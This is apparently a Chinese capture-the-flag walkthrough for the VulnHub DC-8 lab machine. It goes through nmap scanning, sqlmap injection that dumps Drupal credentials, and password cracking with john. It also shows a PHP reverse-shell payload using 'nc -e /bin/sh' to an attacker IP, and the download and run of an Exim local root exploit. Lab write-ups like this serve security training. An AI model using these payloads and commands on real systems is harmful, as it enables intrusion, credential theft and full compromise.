一、環境搭建
1、官網下載連接:https://www.vulnhub.com/entry/dc-8,367/
2、下載之后,使用Oracle VM VirtualBox導入靶場環境
3、為了正常練習,將靶場的網卡模式設置為橋接模式,啟動即可
二、靶場攻略
1、使用命令:nmap -sP --min-hostgroup 1024 --min-parallelism 1024 10.10.114.0/24,快速探測存活主機,找到靶場ip
2、探測服務,尋找突破點:nmap -A -p- 10.10.114.25,開啟80端口,使用的Drupal 7,22端口
3、訪問80端口尋找突破點
點擊界面,發現url帶入了參數
再url后加臟字符,出現爆破,確定存在注入點
4、使用命令:sqlmap -u "http://10.10.114.25/?nid=1" -D d7db -T users -C login,name,pass --dump,順利注入得到后台的賬號密碼
將admin和jhon的賬號密碼,分別復制出來到admin.txt和jhon.txt中
使用命令 sudo john john.txt,破解了john賬號的密碼為turtle,admin密碼無法破解
5、通過/robots.txt信息界面,得到登錄路徑
使用破解的賬號密碼,登錄成功
找到了可以寫入php代碼的地方
將反彈shell的命令,寫入配置界面保存設置:<?php system("nc -e /bin/sh 10.10.114.186 2345")?>
之后切換到view界面,隨便提交一些信息,會反彈shell出來
kali開啟的nc端口,順利接收到www用戶的shell
使用:python -c "import pty;pty.spawn('/bin/bash')",得到交互shell
6、使用命令:find / -user root -perm -4000 -print 2>/dev/null,查看使用有了利用的suid提權的命令,發現不認識的exim4命令
查看版本/usr/sbin/exim4 --version,得到版本4.89
使用searchsploit exim 4,查找到可以利用本地提權的方法
使用命令:cp /usr/share/exploitdb/exploits/linux/local/46996.sh /home/root.sh,將利用腳本復制出來
7、因為靶場可以使用wget命令,所以將kali的apache2服務啟動,將提權腳本移動到apache目錄下
需要在kali中,使用set ff=unix : 告訴 vi 編輯器,使用unix換行符,否則會無法使用腳本
之后在反彈的靶場shell中,切換到有寫入權限的/tmp目錄中,使用wget命令,順利下載提權腳本到靶機
將腳本賦予執行權限之后,按照使用方法輸入命令:./root.sh -m netcat,成功提權
切換到root目錄中,順利得到flag
完